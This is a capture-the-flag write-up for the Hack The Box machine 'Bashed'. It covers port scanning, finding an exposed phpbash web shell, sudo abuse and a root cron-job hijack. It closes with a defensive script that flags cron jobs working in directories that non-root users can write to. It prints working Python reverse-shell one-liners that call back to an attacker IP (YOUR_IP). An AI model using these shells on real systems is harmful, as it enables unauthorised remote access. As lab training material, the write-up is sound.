Bashed

Port Checking

naabu -host bashed.htb -v

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80

Open ports:

  • port 80 web

Visiting the webpage presents us with phpbash. After some googling and poking around it turns out that phpbash is a web shell, so the developer may have left it somewhere on the site, which would hand us remote code execution.

Directory Fuzzing

dirb http://bashed.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/
+ http://bashed.htb/server-status (CODE:403|SIZE:298)
==> DIRECTORY: http://bashed.htb/uploads/

/dev looks suspicious; visiting it shows two PHP files:

phpbash.php
phpbash.min.php

Foothold

Multiple reverse shell attempts were made, but this one works:

export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Get Stable Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (send the shell to the background)
stty raw -echo; fg (turn off local echo and bring the shell back to the foreground)
press ENTER to get the prompt back

Checks

id
sudo -l

Matching Defaults entries for www-data on bashed:
   env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
   (scriptmanager : scriptmanager) NOPASSWD: ALL

Priv Esc

Nice: www-data can run any command as scriptmanager without a password.

sudo -u scriptmanager /bin/bash

config.php

cat config.php 
<?php

//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com";   //<-- Your email

?>
  • No credentials found, sadly.

/scripts was found in the root of the filesystem, owned by scriptmanager:

drwxrwxr--   2 scriptmanager scriptmanager  4096 Aug 23 08:29 scripts

Contents of the folder

-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root          root           12 Aug 23 08:29 test.txt
  • At first glance it looks like the script is run automatically and its output written to test.txt. test.txt is owned by root, which hints that whatever runs it does so as root.

Content of test.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
  • The file is literally a Python reverse shell.

Change the IP to ours (test.py is owned by scriptmanager, so we can edit it as that user) and open a listener:

nano test.py 

s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);

Wait up to a minute and voilà:

nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

crontab

crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
  • The root crontab confirms it: a cron job runs as root every minute and executes every .py file in /scripts with python. Since /scripts is owned and writable by scriptmanager, any file that user drops there is executed as root, which is the whole privilege escalation.
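The root cause is root executing files from a directory that a lower-privileged user can write to. The following script is an added example, not part of the original writeup: it parses crontab text for `cd /dir` commands and flags any directory that a non-root user could write to. The crontab and the stat data are constructed to mirror the listing above (uid 1001 for scriptmanager is an assumption); the `live_stat` helper lets the same check run against a real host.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample input: the root crontab entry found on the box plus a
# benign entry for contrast. Added example data, not the page's own output.
SAMPLE_CRONTAB = """\
* * * * * cd /scripts; for f in *.py; do python "$f"; done
0 3 * * * cd /opt/backup; ./backup.sh >/dev/null 2>&1
# comment lines and blank lines are ignored

"""

# Constructed stand-in for os.stat(): path -> (owner uid, permission bits).
# /scripts mirrors the listing above (owned by scriptmanager, drwxrwxr--);
# uid 1001 for scriptmanager is an assumption.
SAMPLE_STAT: Dict[str, Tuple[int, int]] = {
    "/scripts": (1001, 0o774),
    "/opt/backup": (0, 0o755),
}

# Absolute directory handed to `cd` somewhere inside a cron command.
CD_RE = re.compile(r"\bcd\s+(/[^\s;&|]*)")

StatLookup = Callable[[str], Optional[Tuple[int, int]]]


def split_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for one crontab line, or None for blanks/comments.

    Handles both the five-field schedule and @reboot-style shortcuts.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        fields, n_sched = line.split(None, 1), 1
    else:
        fields, n_sched = line.split(None, 5), 5
    if len(fields) <= n_sched:
        return None
    return " ".join(fields[:n_sched]), fields[n_sched]


def writable_by_non_root(owner_uid: int, mode: int) -> bool:
    """True if someone other than root can write: non-root owner, or group/other write bit."""
    return owner_uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_hijackable_cron_dirs(crontab_text: str, stat_lookup: StatLookup) -> List[Tuple[str, str]]:
    """Return (directory, command) pairs where a root cron command cd's into a
    directory a non-root user can write to, i.e. where a dropped file (here any
    *.py) ends up executed as root."""
    findings = []
    for line in crontab_text.splitlines():
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        _, command = parsed
        for directory in CD_RE.findall(command):
            info = stat_lookup(directory)
            if info is None:  # directory does not exist; nothing to drop into
                continue
            owner_uid, mode = info
            if writable_by_non_root(owner_uid, mode):
                findings.append((directory, command))
    return findings


def live_stat(path: str) -> Optional[Tuple[int, int]]:
    """stat_lookup backed by the real filesystem, for running the check on a host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


if __name__ == "__main__":
    # Against a real box: crontab_text from `sudo crontab -l` and stat_lookup=live_stat.
    for d, cmd in find_hijackable_cron_dirs(SAMPLE_CRONTAB, SAMPLE_STAT.get):
        print(f"[!] root cron runs inside non-root-writable {d}: {cmd}")
```

Only the /scripts entry is reported: /opt/backup is root-owned and mode 755, so a cron job working in it is not hijackable this way. The check is deliberately narrow (it only looks at the `cd` target); on a real host you would also want to inspect the ownership of each script the command names.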
